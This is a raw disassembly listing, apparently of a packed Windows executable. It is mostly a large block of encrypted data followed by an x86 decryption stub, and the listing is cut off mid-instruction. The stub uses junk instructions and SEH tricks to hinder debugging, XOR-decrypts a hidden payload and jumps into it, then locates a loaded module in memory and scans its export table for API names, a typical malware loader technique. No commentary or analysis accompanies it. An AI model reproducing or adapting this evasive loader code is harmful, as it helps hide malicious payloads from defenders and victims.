74FC0E9Ah dd 40C0DA5Eh, 0C84A622h, 0D84872E6h, 18F5EAAh, 70C048D6h dd 80315532h, 858B2B4h, 0C05FD9B5h, 0AFF869F3h, 6FA24DF5h dd 1C2C59D6h, 86EB5EEh, 92CB73FCh, 17A0455Ah, 2A531654h dd 8CA947D6h, 89008ADCh, 0DC86DAE7h, 1B8DD926h, 0BDAED628h dd 301408CFh, 0D88B13FAh, 0AC706226h, 0FC5C2EFAh, 6020FA9Eh dd 0F68430Fh, 0C1F19256h, 47602A12h, 67D22E0Eh, 1E60736Dh dd 0DF7BC246h, 0ABF18DC3h, 23404AFAh, 7074D9B2h, 0B04BF2E9h dd 0AD7A5C2Eh, 0E0730673h, 0BC2ED5B2h, 0BAF32702h, 0D98C9C39h dd 7B3846B0h, 0EC1E059Ch, 8A1756F2h, 0F6531DA1h, 0AF27021Eh dd 0D21F492Dh, 0AA440FBDh, 0B7E44E4Ah, 0F432E55h, 5C067E67h dd 8C8D75A6h, 0E4CC6E28h, 58904A2Eh, 7C5416CEh, 0A8C673Dh dd 0BD34AE6Ah, 85F85C8h, 0AC64461Ah, 3ABCAF45h, 31ECDE9Ah dd 182D2346h, 37746636h, 3CB5BD4Ah, 0B7FC1ED8h, 2585FD1h dd 990DA632h, 0D8583072h, 0A40C3D42h, 0B319396Eh, 3C1445B9h dd 0E00AA2F6h, 2BE39057h, 0E25CAF7Dh, 0BAA70652h, 3864A885h dd 52B1AC5h, 0AA736A8Eh, 18BB3642h, 687802EBh, 64308C51h dd 0FFFE5276h, 7041659Dh, 9B882264h, 6CC6AE2Ch, 4410332Eh dd 0D22D166Bh, 23D86142h, 9514A50Bh, 0BFFF1B3Fh, 0D565195Dh dd 0F8E4DE02h, 0EF35B27Fh, 6AC9A906h, 5C43799Dh, 0A9DEC256h dd 0C64F7062h, 0C0EBDFD1h, 0F5226A2h, 5DBDF25Ch, 0CF9CF4A1h dd 0F35A01ECh, 0CEFC0743h, 8B27DD88h, 44DE528Fh, 0E0E517FEh dd 682B7DBAh, 0B8E85202h, 0C610ABB5h, 0B820EA1Eh, 0E3CB4887h dd 0AA440795h, 31334E4Ah, 809058A2h, 1F60E2E1h, 2B0A7225h dd 0EC7A71B1h, 791058CDh, 589545D2h, 5431E692h, 30D0875Eh dd 94B3A65h, 7B6BBD83h, 465CCF7Dh, 144250Bh, 26C47120h dd 0E72D8D93h, 864CBD77h, 562AF51Bh, 66B476EBh, 0E5175DA3h dd 0C63C81BEh, 4D71C52Bh, 66A4F936h, 3D22DB3h, 62C43D3h dd 0EB2C953Bh, 0A694DB5Bh, 2E3C93BDh, 0D133D216h, 0FBD361BBh dd 0C432E9D0h, 634AD9BBh, 27AC1E9h, 7DD496DEh, 88FF656Bh dd 0DCE25FF7h, 0A9305426h, 0A4AEFCF2h, 0D212C94Ah, 0FABE3D14h dd 3DB68A6Eh, 56DFD105h, 0AF17DB6h, 0D0C9E87h, 78576DB3h dd 0CF1F5DF0h, 15327A7Eh, 5CE4D0ABh, 429F29FCh, 74D6D672h dd 0D8355924h, 8DEC3712h, 0E0370D93h, 248CBE2Bh, 0FD24586Ah dd 76EAB663h, 8D33D49Dh, 549CEE82h, 9F82117Eh, 7CB10B01h dd 93E842BFh, 4776E99Dh, 69F46FF9h, 1C34B6C2h, 7DF78A96h dd 0BF5C8F9Ah, 0B9029FE8h, 3945E6F2h, 9105D4A0h, 12DF954Fh dd 0A0A9C8ABh, 7A2114F2h, 6D29EFD0h, 19BAAA91h, 4BC65F3Fh dd 539BFAEAh, 4C6B9939h, 6404B03h, 0D31BAA5Eh, 0E5F0F3E5h dd 0A83842C6h, 0E1F3069Ah, 0EA7CDE9Eh, 0F37B3ACAh, 68DDFB19h dd 520C2EE8h, 60E988EBh, 38E1D732h, 0AB393F9h, 17B7AE91h dd 9964BF89h, 6CA40652h, 1F1CDA06h, 3D521B40h, 30316A9Eh dd 17B95059h, 0D8D36453h, 0B1B66422h, 10A3E0h, 0C9DF86A3h dd 9E015641h, 28CCD41h, 88022105h, 0FCD11916h, 0B61DE89Dh dd 905C3EC3h, 78C03BE6h, 0A9220529h, 0F8B8B5D2h, 7449B503h dd 0F610C132h, 3AF41D2Ah, 42A129FDh, 0FD94D61Eh, 4DBFA52Ah dd 6CC5F4A6h, 0D1CD946Eh, 0CF27D8EAh, 5AC03AEDh, 544C59D8h dd 7727D186h, 73086BBAh, 0A066BAEEh, 0C3578E38h, 7B9C8002h dd 47D8D4B4h, 970420F0h, 0C5407C2Ch, 0E48C4868h, 0BBC884A4h dd 8FF4D0E0h, 87AF1F52h, 0A8A23516h, 540895B1h, 50A1DBh dd 0BFE8FD0Ah, 719C6741h, 34DCAE6Ah, 66107A3Eh, 0A8604477h dd 0F2D65D4Bh, 54D5A22Fh, 901BCC4Eh, 0DB0173EEh, 0E7B84266h dd 9C564E65h, 0BF3F253Ch, 350023D5h, 984872F6h, 1C6A3EAAh dd 72A53B08h, 97F2FF86h, 8D52BA46h, 0D40C57C4h, 0AE3DABEh dd 935B3BAAh, 0CFE062F9h, 14151A4Fh, 0D0706A8Eh, 2CB64352h dd 14DD8890h, 523CDEE3h, 5FC1A35h, 0CC746117h, 0D8777DA6h dd 0D9C13D40h, 3000F33Eh, 32B9B9Ah, 4C1D95C9h, 945C3EC3h dd 1430FABEh, 86847681h, 0C12C17B1h, 0C46C5E1Ah, 974422CEh dd 0B07FA32Ah, 0DFF76956h, 0E4450A9Fh, 0C04059DEh, 7C8029A3h dd 0E8C8F266h, 0AD2714C2h, 0E0121653h, 42D8BEB2h, 6068DD89h dd 0E9154590h, 2070F85Eh, 13DA3B2Ah, 3C6DA579h, 87AC0E73h dd 2470EA0Eh, 98B141C8h, 0E8F892AFh, 0C0BD4E5Ah, 7EAEF214h dd 0D7AC191Dh, 0A8F74D58h, 6F67D483h, 0A0D2D6ABh, 579B9DF2h dd 0ECA56B7Eh, 9DDCBE38h, 87188676h, 752B966h, 0D34ED2F5h dd 7D685B7Dh, 10B3AA5Eh, 0CF007612h, 91BAC720h, 7C0E8Ah dd 0BD6A3254h, 576C59DDh, 60B78D18h, 82855ACDh, 161039C5h dd 0B8112199h, 0B58B2CFh, 0A01C6EBAh, 2265CC24h, 0ECA4167Bh dd 0B980D873h, 0ECD36137h, 2F0F94BCh, 634934BAh, 8058B2E9h dd 0CBC335CEh, 0B866A37Dh dd 67A2739Dh, 0D0399B7h, 645CC76Eh, 0F2E71859h, 0FCD49671h dd 14707643h, 24A3D106h, 9ACE12A1h, 9482397Dh, 53CE87B9h dd 0BE7F59Bh, 0D294AF45h, 94DFF682h, 0DF448ADFh, 0E4450A9Fh dd 0C04059DEh, 7B3C52A2h, 48F176E3h, 248CBE2Ah, 77CFEE8h dd 0AC2DD237h, 88D82276h, 0BC969B3Bh, 0DF9F473Ch, 13D9CD2Ah dd 3C6DA579h, 84AC0E73h, 2474EA0Eh, 0E1985ED8h, 89107D69h dd 4343B1A7h, 90B99E9Bh, 4C44E2E2h, 0F01FC6A6h, 1B3383FCh dd 4E506396h, 74ECBD3Ah, 0E31C9676h, 0FF24DBC2h, 9F48D159h dd 5B9BB9FFh, 68119643h, 44ECD68Ah, 90C2DF4Eh, 0CC4DF4AFh dd 0C14C42D6h, 8B016B72h, 58E962A1h, 0A98E6F0Bh, 0D8584B98h dd 0AE0FDA6Ah, 60E974CBh, 777C7D32h, 0B8A75D0Bh, 5196C40Bh dd 0A0F003FCh, 9198EEE8h, 8E672DF9h, 1415E04Fh, 10F4E78Eh dd 7C757656h, 0EF5B21Eh, 9E3D7E71h, 0FD2072C9h, 0F0ED999Dh dd 7A305402h, 0E1BBA711h, 3000F32Ah, 0FCD49662h, 81286542h dd 0E1E44850h, 6C1F844h, 0D0182E29h, 10186DB9h, 6FAC6DA0h dd 0D2B89747h, 0D903F682h, 28A8FBD2h, 0F47C8E3Ah, 28174DABh dd 73FBDA7Ch, 0E807793Ch, 2E469572h, 0E069F66Bh, 405EDFB2h dd 7410CADCh, 0ECFA11C5h, 0A5977A7Fh, 0EC34BF46h, 0B8E852C6h dd 402C1D3Eh, 2CD5E026h, 7A34A6EBh, 64450B3Dh, 1FBC5E18h dd 0B9049FE9h, 4C44E6F2h, 117DF2A6h, 61CE2EDAh, 0B0807352h dd 0F8D1E158h, 0C818F28Fh, 61DCAE7Ah, 0EA18CA35h, 0BC5D3B87h dd 45C3B8C6h, 5CDD66ECh, 29342FB9h, 0DD747602h, 0AA4C42D6h dd 0D1F6272Ah, 40D0E323h, 68742E2h, 0C8710F43h, 0C2A758AAh dd 87208BD6h, 2CAD52B7h, 85AA2F6h, 601E1BBAh, 0DD4530B6h dd 0AA4167Bh, 90D55BADh, 0BC2C8E88h, 0D0F0431Eh, 1831C1F9h dd 6078122Fh, 403CCEDAh, 0FC2072EFh, 4933999Dh, 98980BA2h dd 644CFAEAh, 88A0C1DBh, 0C5AA1378h, 23326226h, 10D9D9B7h dd 6020EA87h, 59E4C68Ah, 7B10F457h, 0BAC954EAh, 0F6303AF7h dd 0F634C539h, 90DED7BDh, 51769633h, 0C05063A0h, 8607C262h dd 48F18CC3h, 0D327D82Ah, 0E0690E6Bh, 0BC0456B2h, 9604476h dd 0D49F9AFAh, 856AB23Ah, 0EC34BFBCh, 0EE7F9E0h, 94959CCFh dd 0FF98410Eh, 0EBCB4929h, 0F8C10613h, 0B4BC4E5Ah, 308E6E5Eh dd 30C1E4B2h, 0B208A29Fh, 1B37EB82h, 4EDFC7D1h, 3EC49B7Bh dd 0CDEFE2A6h, 14CC97FEh, 60A07A3Eh, 44D44A76h, 0C5A1B96Ch dd 44FC9C3Eh, 0F158AFA5h, 348B89E9h, 57C7B9BCh, 4D788B6Dh dd 40C0DA4Eh, 7F1A623h, 5D423256h, 0A41C07D6h, 16DFE1C4h dd 3654558Ah, 1861DE53h, 64B708BAh, 2517907Fh, 6CB43FC6h dd 386AD206h, 81DBB1BFh, 0D0E0530Ah, 9CB03652h, 0A8C81863h dd 0D424BD0h, 0A58A9A8Eh, 0CCD45FE1h, 0FE98D2E7h, 0CFCD9852h dd 38FBCA1Eh, 79DED6C2h, 0C8885B48h, 10D9D950h, 6020EA87h dd 59E4CE82h, 7B10F456h, 0B9C954E2h, 0F6303AF7h, 0B7F54639h dd 22F0725Eh, 0E445F39Fh, 1FA8F0DEh, 7BFBD958h, 48F176E3h dd 348CBE2Ah, 85253BEEh, 3FAC3097h, 0F57D288Eh, 329CFE03h dd 8AA08955h, 0AEB43BEBh, 3D1F5296h, 84BC27CEh, 5050EA0Eh dd 6B85A9A7h, 509E997Dh, 11B65653h, 80902363h, 46470222h dd 831CF03h, 0CD67186Ah, 0A0D2DA93h, 0F6959CF2h, 585A7213h dd 0A477C87Ah, 9C257866h, 664563Bh, 87D26B2Eh, 0C0692975h dd 13B0BA77h, 0A8757612h, 2CBDB5FAh, 74FC1EA3h, 35C4DA5Eh dd 88015102h, 0D84862DFh, 0D10F3EAAh, 890EE264h, 777C29CDh dd 0E0A75D0Ch, 2BE394BAh, 5F1A7B96h, 0E821F1BDh, 3868C23Fh dd 70249ECAh, 7A39DA86h, 634E1BBAh, 0ECFDF5E9h, 343CDEE3h dd 74109A9Eh, 0E6C3D648h, 88B14EA3h, 7EAC3FEAh, 141843A3h dd 80719472h, 898720Fh, 50DC2D1Eh, 9FC851BAh, 9C1B397Bh dd 0F403827h, 0A293A1F3h, 9AD0D576h, 4CCD8A37h, 0C013A456h dd 0B8377FCh, 0F9C4DF29h, 8C2426B2h, 1CBCF266h, 0A90779A1h dd 0F040C866h, 0FD9D9799h, 8280928Ah, 44A592BFh, 9F8810FEh dd 1BDB793Bh, 0A8D1D603h, 0C4AC1E4Ah, 367C9E0Eh, 16F7E66Ah dd 0F8C1FE13h, 0D2B6A55Ah, 8A60E5A6h, 5C7D9A47h, 0F0A3D4A6h dd 1B3387FCh, 8914CFD9h, 7C5716E2h, 176CE3B6h, 915761F1h dd 0E0B0389Eh, 0E4ED8E29h, 8FE1213Ah, 54D55A0Fh, 90B0AA4Eh dd 517A0312h, 0B8013E53h, 34F4849Ah, 33C323DEh, 0C1802BDAh dd 0D85856A2h, 1404DE6Bh, 7633A1E5h, 0FCA56E54h, 0B03E0990h dd 6C74EE35h, 0A2E03A7Eh, 340F60A3h, 4DA157ADh, 3594F8CCh dd 605B0C4Eh, 0B75C9C91h, 9F87FDEFh, 24054A5Fh, 9A9Eh dd 47DE12E2h, 2C0DB9E9h, 4F4CEEA8h, 0CC584366h, 32DE99Ah dd 625BD2C9h, 6BA52B12h, 0F0A57741h, 0DBE4D6BBh, 0E89116C3h dd 0C46C5E0Ah, 0C7365FEEh, 0B7AC0EB9h, 0EB494Fh, 24577631h dd 82E8D755h, 190526B2h, 58D8B0EEh, 6007872Bh, 4DD98ECAh dd 0BC0446DAh, 0CA549FFDh, 0D1B7EE2Ah, 2070F876h, 0D5A00335h dd 0B8A85296h, 86D81E4Ah, 92DB32F9h, 4B62B6D6h, 0AA3C3F15h dd 0BBBC4E4Ah, 8081C39Ah, 4C490EE2h, 5D43B2A6h, 0A8893038h dd 0F4BE781Dh, 83545ABEh, 58269023h, 0CC59277Ah, 0B3A06A7Ch dd 0AF581E89h, 505BED1Eh, 0ACD89D01h, 0EF4F5F57h, 9ECCE399h dd 0AB6342C6h, 0F17502D8h, 40D09882h, 858CE421h, 0C80A9263h dd 8C7FB5AAh, 7050B991h, 0CE7CD632h, 83A75D02h, 0C45ED607h dd 46086C7Eh, 0E75BF9B6h, 282A6A93h, 0C6615CAh, 0FBFC208Dh dd 995DB59Ch, 69188A19h, 0B033CEDAh, 9BC4h, 8E78D361h dd 2D8B3236h, 645CBC92h, 3FF8F602h, 0FCD434F7h, 0CCDEEF36h dd 0D624ABD1h, 6623FAAEh, 0D8472ED2h, 452B6DB9h, 0C47C1CB2h dd 0AB3B5FCEh, 0DFFBFAD5h, 28B8C34Dh, 614582F1h, 0C0501866h dd 8D09A3ADh, 0DDCBF266h, 249CFC52h, 0F680B88h, 40915997h dd 3D82276h, 17B7EC7Ah, 4688EACAh, 0D5DB7936h, 0A8AAEA3Bh dd 6029114Ah, 5370EA0Eh, 0C760A57h, 907D8196h, 3FBC5E18h dd 8CC7311Eh, 4C8964EDh, 5F33B2A6h, 204F7162h, 33904A2Eh dd 3B571432h, 309DE1A2h, 46DCBE38h, 3815856Eh, 53645640h dd 68162053h, 8469848Ah, 10072F41h, 409D7612h, 943842D6h dd 0E0790165h, 0C0C0DA5Eh, 898BB31Ch, 0D848726Dh, 8F0D7821h dd 98803E2Dh, 0C36B25C7h, 4AE01FCFh, 0A3696EAAh, 0E25CBF7Dh dd 0E9A70652h, 3878907Eh, 46C81B43h, 0D07B6A9Eh, 0DE68B369h dd 600A0206h, 76DC4BE1h, 69729A8Eh, 0CCC4665Fh, 70BF4056h dd 644CFEF5h, 0BBEC8423h, 0FFD6BDB3h, 4DA37274h, 944C6C1Eh dd 0A4A3F6CBh, 0A3D53992h, 99B4B602h, 4BAF45E1h, 8072B24Bh dd 0E97F9692h, 28A8802Eh, 0B881DF2h, 0C0E93B21h, 0F98426A2h dd 548FD968h, 63B7B758h, 0CCD285E6h, 0F5EBA94Dh, 766AA779h dd 681711C5h, 0A4C73BDAh, 132486EBh, 5307AD79h, 0A0E69F08h dd 0B070EA6Eh, 97F4859Ch, 6D7FA69Ah, 0B4AC0C9Eh, 0C2409F97h dd 0F5C9E6F2h, 18089B2Eh, 0A6B4FB69h, 15F64A3Eh, 0BA7F5857h dd 630CA0B5h, 521AA238h, 616792C5h, 0AC644651h, 782812C3h dd 1B109803h, 0EFE76910h, 0CC4A0887h, 0B7D083D6h, 75E68B95h dd 1490DA5Eh, 0F3EE8E48h, 0E696E719h, 64893EBAh, 75580531h dd 0D494D633h, 0F7A7467Ah, 0D41C7F52h, 0D485697Eh, 9C86F04h dd 4D0BB755h, 7D58F7B8h, 650F6ACFh, 9CA4741Eh, 564A97E9h dd 0B1B5CECAh, 10D8CAh dd 0CCC47F8Ah, 0CCED6126h, 2B29958Bh, 4275A4D9h, 8CBDFE01h dd 0BEF11066h, 0F3394293h, 8877FADBh, 0D31B2EDFh, 0F8A881AEh dd 96090D0Ah, 0FF4459ABh, 2EA493E0h, 44D1B43Fh, 0F419E97Fh dd 287FB289h, 9EECD95Dh, 0BC8F266h, 47EDFC4Fh, 0A020FF85h dd 0D5623FC0h, 0EDBF471Ah, 7674B93Ah, 0C89F4516h, 0EC2486DAh dd 0D0AB37D5h, 0E1CB702Bh, 39048540h, 6E64CFB4h, 8491F4FFh dd 0B4D9293Fh, 677FF249h, 1814191Dh, 2598372Bh, 80A67E7Ah dd 0E791207Eh, 42BE830Dh, 7491E2A6h, 3249515Eh, 0CAA06A00h dd 0E4D9CBC2h, 28280287h, 0F1138EDAh, 10A097DEh, 0D874777Ah dd 0A95216D6h, 2069F1CDh, 14C0CA1Ch, 0F3D3A248h, 0C80A2673h dd 0B0C8BDAAh, 329CBF91h, 0A96BD622h, 8489C94h, 6191ADE5h dd 0A0F07B36h, 0A31F914h, 0BB68C238h, 80236132h, 0D0F06A35h dd 0DEECB3DBh, 68120206h, 96A9318Ch, 85008AA0h, 684069A2h dd 0B3883226h, 0E1CAE2Ah, 317A9AADh, 0FCD4961Ah, 5D6734F6h dd 944C10B8h, 6FDF023Dh, 2CE2C106h, 0A42D1B46h, 496C4E48h dd 80724A43h, 34617B92h, 79B8D214h, 0A47CE448h, 0FE2ECF21h dd 748726B2h, 8D4CFD99h, 4E8CBE2Fh, 0ACE575EEh, 431446F0h dd 98E648E3h, 0AB646D3Ah, 25DE3EF1h, 69AD86C2h, 0B8F810F6h dd 47AFD779h, 3A21BA5Fh, 0A9CBE7D6h, 0E8E8C0CAh, 8AFADBA5h dd 40051A0Eh, 49DE62EDh, 0D13BB2A6h, 0A6B8FBE3h, 0E1C14A3Eh dd 7C4B7EA3h, 0B748E2B9h, 4E220EFh, 0EF60FF3Eh, 0AC611586h dd 0AD9BC6h, 87ECCEC8h, 10C241F6h, 0E43FFD12h, 91BCC721h dd 74FC0E8Ah, 46B5FA5Eh, 1CEC2321h, 0A7B72F6h, 55FBFFA9h dd 0F559EB99h, 3C8494B6h, 8712D4Eh, 0E857E5BAh, 0B088BF7Dh dd 0BE970652h, 0C99F1305h, 81A57F3Dh, 0D0E028F2h, 0D7033991h dd 5D9BFB10h, 3B249D57h, 314D929h, 0DAF2FB2h, 1958310Eh dd 0D3BA1D0h, 2D6433C0h, 0FDD8ECF1h, 83138244h, 801EA5C6h dd 0ED30B8BDh, 0DB1B8EC6h, 0C369B19Fh, 0D42E2E8Fh, 0C4BBE9CEh dd 9CC7E6B6h, 280040D9h, 7FBF8E1Ah, 4D4BB111h, 9C456E1Fh dd 87430E66h, 18207719h, 0CC56F88Fh, 901621C8h, 0D4E48856h dd 7AA0024Eh, 205C678Ah, 25C76EB7h, 0FDD5530Dh, 0F0AC5B12h dd 1323D705h, 993BB680h, 17077DA5h, 0E3814DD1h, 8FC35457h dd 0B3BBC066h, 5B5F8F59h, 60C3303Fh, 4F6FB535h, 4F1741CFh dd 589CED84h, 29235185h, 0AFF4296Eh, 5361C20Dh, 0A31BED39h dd 0BB12F362h, 0F8A0DFB1h, 238B8AE8h, 57C6633Eh, 98780165h dd 733F25A0h, 0C924EF0h, 0BBA072E6h, 4CF3C155h, 70D00A6Eh dd 2F79576Fh, 0E158B2C2h, 0D41C6D40h, 2BD2C51Ah, 7CE67EF7h dd 1AE1B606h, 49121FACh, 337565D4h, 17B43651h, 0B67B3E48h dd 64074FBCh, 0D38595DBh, 3BC46661h, 0B8882465h, 0E143FEEAh dd 3010C968h, 0FE88D584h, 0CB24E639h, 0D7D72EFAh, 0C080C7B6h dd 0A8EB6622h, 0F8A891E8h, 0E44C7E37h, 33B425EEh, 0D7F4F691h dd 28B80ADDh, 0A56A6D1Ah, 3FAFD236h, 3089255Dh, 5BC8E224h dd 64ED3DE4h, 0B43109EEh, 428FBEB2h, 0AD7DD89h, 549CED40h dd 62A01F7Dh, 672486D2h, 0F2635AC4h, 0F76D355Ah, 0BBB0D90Ah dd 95FCB5D7h, 6D7192DCh, 0B4AC0CDAh, 388C501Dh, 4C45E6E2h dd 0FEB65AF7h, 71FC8195h, 0B08073ACh, 0C9643643h, 4808DB35h dd 0DD228E10h, 8B40266h, 539BA0A6h, 0EC27C043h, 750E0D48h dd 892EDBh, 2B919D12h, 0B801C653h, 74FC0E9Ah, 0B7E2AE5Fh dd 1CBD22A7h, 0D84871E6h, 25004BAAh, 60E98ECBh, 0C36B2932h dd 8952490Dh, 0C425EA37h, 0A0E03A7Eh, 6CA26E4Ah, 5031D206h dd 42C9ECCh, 36A682D6h, 193EC9ADh, 68683B6Ah, 48164A5Ch dd 88008AA7h, 0DCFD1AE7h, 6F68D026h, 74757A6Fh, 3010C2AEh dd 7CDDE372h, 0D8A11C8Bh, 51282FFAh, 59A47F49h, 2CE4C692h dd 0E3DC9A46h, 0FD10E38Ah, 0E4352ADEh, 21497622h, 2DB8D26Fh dd 49FC296Eh, 0C05063A0h, 7B9A52A7h, 48F176E3h, 248CBE2Ah dd 7059FEFEh, 0AC2D2A0Fh, 1AF2076h, 16584BB9h, 0C860BAEEh dd 13DB7464h, 4715116Eh, 86DDF6B5h, 0CDFBEA0Eh, 1C24F4AEh dd 0AA781F95h, 0EF544E4Ah, 8F7FE5E2h, 4C46B766h, 60BD39A6h dd 6FCC6E28h, 6E937670h, 83A94A1Ah, 739AED49h, 95DCAE78h dd 0E0C05E74h, 52EFA602h, 22B4494h, 5496DD9Eh, 29342FB9h dd 0DC747602h, 0BC4D62D6h, 3634B313h, 0F54DDA4Eh, 0C949FB2h dd 0C820FF6Dh, 0FF3EBAh, 7AB4B339h, 8919D632h, 848B2F6h dd 0D4ADCB49h, 413389Dh, 552083B5h, 3868D216h, 8023BECAh dd 0D0F06A20h, 749C45ADh, 9787EFC7h, 76845B51h, 0D2859A8Eh dd 0CC5CE26Dh, 2D033226h, 645CBC92h, 0B1008025h, 0FCB4B238h dd 82B38236h, 0A75E5DF2h, 7452F977h, 3C8C4BB9h, 75239256h dd 0C47C4E62h, 0ACBB7CBCh, 345175B6h, 28B8D246h, 0F4142999h dd 4B405ADEh, 0C6052ED8h, 0DF3FF16Eh, 0A80935DDh, 7509AACh dd 0AC2DD237h, 88D86276h, 0A39E9A3Ah, 2C12B9E6h, 59ADB6EBh dd 0B8F81042h, 85846DC1h, 0D4F51D3Eh, 5C34A6EBh, 9CF88296h dd 0E5A4B958h, 7F7C31F6h, 40AFBF1Dh, 3320C1A5h, 0B29D7218h dd 0E9CFEEDDh, 45C4A37Fh, 0F591E2A6h, 14CCECB2h, 0BEFFDECDh dd 21F6770Dh, 78292D41h, 0C679E48Ah, 65B0BA77h, 0A4A61F14h dd 0CE2A7680h, 9C155E13h, 0BF3F0079h, 0CE2D78h, 2F5838E5h dd 0B435BA2Fh, 70D00A6Eh, 39D55B12h, 85D1B183h, 0D40C2C7Eh dd 0B088BF7Dh, 0CB270652h, 3868D26Eh, 2C6FB5CAh, 0D0A3ED07h dd 19433652h, 68683D56h, 343CCEDBh, 43C79DEAh, 6C64C66Ah dd 1C0DC586h, 644CEED3h, 4400CAAEh, 0A73CC475h, 92679DC1h dd 0D698A371h, 65C3FAAEh, 0C7CC8D0Bh, 3825194Bh, 276C4E48h dd 1B33C1CCh, 0D903DED9h, 28A8FBD2h, 0F47C8E19h, 45CB4EAAh dd 8C14646Ah, 1A787F65h, 0A18FBE3Ah, 0F040C842h, 0F69F5EB3h dd 0F45DA966h, 6D9CFE78h, 2313B2B4h, 0ED2CCC4Bh, 0DB6B42C4h dd 1271E12h, 5060A88Ah, 1C1D26BAh, 0E0BA8396h, 0E4FF4F03h dd 0B9028F94h, 0C9B3E6F2h, 18188B22h, 0C4CC7E6Ah, 3D934C5Ah dd 7C44069Ah, 0CDEFE200h, 14CC97FEh, 0E0A27A3Eh, 6A9A5277h dd 41AC9731h, 44ECDE9Ah, 16C5AA4Ah, 0E5F7C398h, 2DCF42C6h dd 74EC371Eh, 40C09A5Eh, 0B0EAD57h, 0DAE2B0E4h, 4FFBDC7Ch dd 42D78067h, 0EA967CF0h, 0DA6B5514h, 0B03EE5DEh, 23B838F1h dd 7CE65AFFh, 0BC67D206h, 0FBD36475h, 9288DF71h, 94B3642h dd 68683CA4h, 76487B25h, 95FF9A8Eh, 0CCD45844h, 0DAE8BFABh dd 0F1C1FEFAh, 300088C6h, 0FCBEC423h, 8AC4D7C9h, 1A32EEAh dd 6030C418h, 6EB8737Dh, 6D579256h, 0C47C602Ch, 0D1789F43h dd 0E90BF682h, 28A8800Eh, 56E9714Ch, 43404AE0h, 9C467A07h dd 0B00BF266h, 248CBE2Ah, 7151E0B3h, 0AC2CD95Fh, 87287A76h dd 411C6BFBh, 0E0E5BAEEh, 13EC0501h, 3D295D76h, 84BC0BCAh dd 5060D7CDh, 41B6F8h, 0CC8403F0h, 0C1CD2256h, 44687A0Dh dd 39BB191Dh, 0E2BD5AA3h, 36248195h, 0D16FB5D1h, 479E9DCh dd 0F00AD6E0h, 14DCAE5Fh, 1F05925Eh, 9511B9FDh, 480C564Dh dd 5A46B07h, 403BAA5Eh, 0E6F5101Ah, 8D4B40D0h, 74FC66CCh dd 844BDAA1h, 5CD6A648h, 0E6BAE719h, 608F3EBAh, 2CEE8B66h dd 49C8E90Dh, 0C9E21F5h, 2BE60C52h, 5F9FD281h, 0AFC5F9BDh dd 3868A6BEh, 0BC9D75CAh, 0D0F06AA1h, 9CB42BBAh, 6858C016h dd 343CFE62h, 10729Eh dd 0E8066662h, 990D8A26h, 67A4FEEAh, 0F210CAAEh, 0A859965Eh dd 0E6556E12h, 0E85CD679h, 60C89AA7h, 0A7E4C682h, 0A598B612h dd 29ED4481h, 902013A8h, 0A314117Ah, 2C7AA3A9h, 0F67D8D1Ah dd 71455CD9h, 7FF08D4Ch, 7C15FFCBh, 8B010010h, 0FFh, 24Eh dup(0) dd 43A0D500h, 31h, 1316h dup(0) db 90h ; --------------------------------------------------------------------------- push ebp mov ebp, esp call sub_31442015 jmp short $+2 cmc cld call sub_3144207D jmp short $+2 cmc ; =============== S U B R O U T I N E ======================================= sub_31442015 proc near ; CODE XREF: UPX2:31442004p var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 ; FUNCTION CHUNK AT 31442099 SIZE 00000125 BYTES ; FUNCTION CHUNK AT 314421D8 SIZE 00000007 BYTES push dword ptr fs:0 mov fs:0, esp stc jmp short $+2 xchg ebx, ebx sub eax, eax loc_31442028: ; CODE XREF: sub_31442015+19j dec al or al, al jz short loc_31442032 jnz short loc_31442028 jmp short loc_31442099 ; --------------------------------------------------------------------------- loc_31442032: ; CODE XREF: sub_31442015+17j stc mov eax, eax call sub_3144203D clc jmp short $+2 sub_31442015 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144203D proc near ; CODE XREF: sub_31442015+20p pop edx cmc add edx, 5Fh xor ebx, ebx or ebx, 2990h cld mov esi, 1Fh clc cld push edx nop loc_31442057: ; CODE XREF: sub_3144203D+27j call sub_3144208B add edx, 1 dec ebx stc stc or ebx, ebx jnz short loc_31442057 pop edx clc mov esi, [ebp-8] mov fs:0, esi mov eax, eax leave jmp short $+2 cld jmp edx sub_3144203D endp ; sp-analysis failed ; --------------------------------------------------------------------------- jmp short $+2 xchg ebx, ebx ; =============== S U B R O U T I N E ======================================= sub_3144207D proc near ; CODE XREF: UPX2:3144200Dp arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3144207D endp ; sp-analysis failed ; --------------------------------------------------------------------------- cmc ; =============== S U B R O U T I N E ======================================= sub_3144208B proc near ; CODE XREF: sub_3144203D:loc_31442057p xchg al, [edx] jmp short $+2 xor ax, si cld mov [edx], al retn sub_3144208B endp ; --------------------------------------------------------------------------- stc cld cmc ; START OF FUNCTION CHUNK FOR sub_31442015 loc_31442099: ; CODE XREF: sub_31442015+1Bj call $+5 mov eax, [esp+8+var_8] cld mov [eax+32C7h], ebx mov ecx, [eax+297Fh] mov ebx, [esp+8+var_4] and ecx, 10000000h jz short loc_314420E5 pop ecx mov [eax+32CBh], esi mov cl, [eax+2983h] mov [eax+32CFh], edi cmp cl, 0E8h jz short loc_314420DA mov ebx, [eax+2985h] jmp short loc_314420E3 ; --------------------------------------------------------------------------- loc_314420DA: ; CODE XREF: sub_31442015+BBj add ebx, [eax+2984h] mov ebx, [ebx+2] loc_314420E3: ; CODE XREF: sub_31442015+C3j mov ebx, [ebx] loc_314420E5: ; CODE XREF: sub_31442015+A3j push ebp mov ebp, eax sub [esp+8+var_4], 809Eh sub ebp, 101005h mov edi, [esp+8+var_4] lea esi, [ebp+103990h] mov ecx, 0 rep movsb call sub_314421BE mov ecx, eax call sub_314421BE sub eax, ecx jz short loc_31442190 cmp eax, 100h ja short loc_31442190 and ebx, 0FFFFF000h loc_31442124: ; CODE XREF: sub_31442015+11Ej cmp dword ptr [ebx+4Eh], 73696854h jz short loc_31442135 loc_3144212D: ; CODE XREF: sub_31442015+12Dj sub ebx, 100h jnz short loc_31442124 loc_31442135: ; CODE XREF: sub_31442015+116j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3144212D add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_3144214F: ; CODE XREF: sub_31442015:loc_31442163j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_31442163 cmp dword ptr [eax+5], 6441636Fh jz short loc_31442168 loc_31442163: ; CODE XREF: 